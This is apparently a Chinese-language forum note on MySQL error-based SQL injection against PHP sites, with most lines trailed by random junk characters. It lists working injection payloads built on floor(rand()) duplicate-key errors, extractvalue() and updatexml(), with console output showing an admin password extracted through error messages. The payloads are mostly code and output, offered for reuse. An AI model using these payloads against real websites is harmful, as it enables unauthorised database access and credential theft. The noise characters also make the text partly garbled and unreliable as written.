放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。/ C. h/ Q& }" D1 l* z2 R6 g
实际测试环境:: J) Q8 W; G# G+ v' F
; C" s* _" d# l u9 F ; W% ~! B/ U/ m6 P+ j4 S1 o1 R
mysql> show tables;3 b ]) v7 A7 t# n- h3 X
+----------------+
" P0 V O. d$ E* t| Tables_in_test |
. o3 M) O0 F$ I+ P+----------------+
: S2 [, q; Y1 t; c# ~9 m+ o| admin |
5 _3 h" e" }# a! s| article |( [& Q& z* C0 m0 H( y
+----------------+
; D; p9 t; Y6 E) I* r 5 }1 K. _" J7 h/ }: q, `& L5 E
! S$ E) f9 E8 }0 K# z: I; j
7 o4 l% \- W; x
mysql> describe admin;! G1 x6 h0 O$ H1 U, i0 J
+-------+------------------+------+-----+---------+----------------+
/ f; i# q! ?" d7 p; x( S| Field | Type | Null | Key | Default | Extra |/ U& H1 M2 \3 ^* d6 C
+-------+------------------+------+-----+---------+----------------+ @" m# |6 m# F4 n, ?
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
& U7 P1 o! P' o# c| user | varchar(50) | NO | | NULL | |8 C) p- Q* H. T
| pass | varchar(50) | NO | | NULL | |
# p" i5 p+ }5 L. e$ ~+-------+------------------+------+-----+---------+----------------+& Y0 j* Z. ]2 Z6 |$ s* Q# ]( }5 @/ C6 l
$ C- ~: H3 O8 [9 u$ w+ k1 N) t- I$ S
' ]9 w4 Y0 g1 B0 F+ @
0 y8 g( [, l( p4 D7 m; r9 s# l
mysql> describe article;* f* E, y1 f, T4 t: K
+---------+------------------+------+-----+---------+----------------+6 X+ [ N* q" ` b; m
| Field | Type | Null | Key | Default | Extra |/ q$ H) F- T b) X$ C! R0 O5 g
+---------+------------------+------+-----+---------+----------------+
/ x6 C; f+ e; G1 f: j7 N! j% l| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
+ Y; {$ O9 g/ T+ R ^+ d| title | varchar(50) | NO | | NULL | |
1 Q8 Q1 |& T$ B5 \9 ?( j| content | varchar(50) | NO | | NULL | |
" n7 S& }3 @+ o: |; W; O$ T" t+---------+------------------+------+-----+---------+----------------+
& f# D& G" M; R& I: ]2 A" a) v+ Q1、通过floor报错* N/ s# O7 D1 l. p# f3 q
可以通过如下一些利用代码
9 a; u0 Q; U) D. |2 P" K' _ G( i4 G 2 J5 e# l2 `2 M @! g, ^
" U& l$ e7 I+ l2 w4 h
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x7 [: |, u/ J6 Y5 X% i! |8 }
from information_schema.tables group by x)a);1 y2 @4 T4 T, b+ o( ]
z+ ~, S/ {; X; i' I& Z 1 Z5 `# x9 l) @3 ]+ D
and (select count(*) from (select 1 union select null union select !1)x" U0 [% g0 g$ K: S* l4 ?, A: S
group by concat((select table_name from information_schema.tables limit 1),
3 ~6 y; R1 Q: p) E- Qfloor(rand(0)*2)));
* l, K4 C1 _# C0 L* N+ }举例如下:, q/ j+ p! |) M0 d
首先进行正常查询:
1 Q. Z1 x3 Y, X! }- l2 t
B: W$ K/ l* Y5 X5 d9 u5 |mysql> select * from article where id = 1;
9 \$ R" b" r! |+----+-------+---------+4 l0 Q4 g; C$ f5 r! |" C
| id | title | content |
* ^2 U9 T: ?2 l$ @+ ^( M+----+-------+---------+
# u' e0 z0 h& R4 W4 [* w8 ` @| 1 | test | do it |
$ g9 ^6 L7 y1 q+----+-------+---------+
. w- q4 w% h/ c* Y6 M! f' R8 m假如id输入存在注入的话,可以通过如下语句进行报错。
- A0 h8 k; \* H1 S9 g $ c6 }# H$ t- s: \1 N
0 \/ Q% U# w5 a7 A" c9 C6 _mysql> select * from article where id = 1 and (select 1 from
: Q8 D4 V6 e) m0 H(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
# b* g t! [% t) o5 yERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
( |5 t8 f3 k" _3 A可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。6 a8 g/ ?! h. l0 ?
例如我们需要查询管理员用户名和密码:
& J$ H& f8 W% A l% O7 z4 ?! KMethod1:# L# t# @& U+ v9 E* K% H
. N9 ? R! U$ D, ~4 m0 |! A
y6 g# j8 m: v% D# d; ~mysql> select * from article where id = 1 and (select 1 from( F5 P1 A" W/ U, o/ o3 Y
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x: \# A* z" s; A
from information_schema.tables group by x)a);
$ c* f& p/ A' Z' L) y3 o* GERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'9 H; R- p2 i* y, L5 r
Method2:' a0 ?, P# {- ]% L. c3 R+ d T
% {; R0 L& g. g7 Y d- w+ X- o( s
' Q" F: e1 \% ^4 n& T$ [1 p
mysql> select * from article where id = 1 and (select count(*)
/ R4 ?+ z o& Y' ?7 y; ?1 }) a4 e9 r# Zfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
! p( q/ Z, O, C: G* bfloor(rand(0)*2)));- U F$ ^- L( e7 @4 b1 _, ~, l" S
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
- [, [1 x+ ?& l- N- s3 {* ~8 C2、ExtractValue. I- ^' K B1 D* K z. B
测试语句如下* {9 a j6 I9 _1 @+ d2 w
! @( u( G6 v8 M/ X
7 o# B1 Q8 H8 y* q' B
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
- t9 O' I4 i7 Z8 Q* C& t. r0 i实际测试过程
- d1 n5 a6 `8 _: T/ x, v( _: M ; X: F" N4 ?# W( \0 N* C
" {! j& o# s% V x# F+ G& [# h9 omysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
) x3 R0 p4 N% _9 f6 T(select pass from admin limit 1)));--4 ]- p' p c& @# ^
ERROR 1105 (HY000): XPATH syntax error: '\admin888'; ~7 z$ G* Z h) M6 Q
3、UpdateXml
, {4 K4 e, U! Q U# {/ O' @测试语句
7 y4 a0 h8 j9 M" J
; ~; ]9 F ^( a
$ F- m0 t% ^) T$ ^& O! ]" P% wand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))# i' S( Z4 m3 [! q
实际测试过程8 _/ }+ ?1 A4 F! Z
! X: `% y, O, `' _7 R
" t' }) d1 }. ]
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
, }* M6 F) A" d1 k5 f- l( j5 G(select pass from admin limit 1),0x5e24),1));2 Z% J9 m4 H7 m- U' U
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'# @1 v7 L0 ]' D6 l: s. s) {/ {
All, thanks foreign guys.
' m5 Z U/ v2 G& E ) H1 Y6 l, a. n# |3 I
1 R q- @" f' Y0 @; `3 u) K
|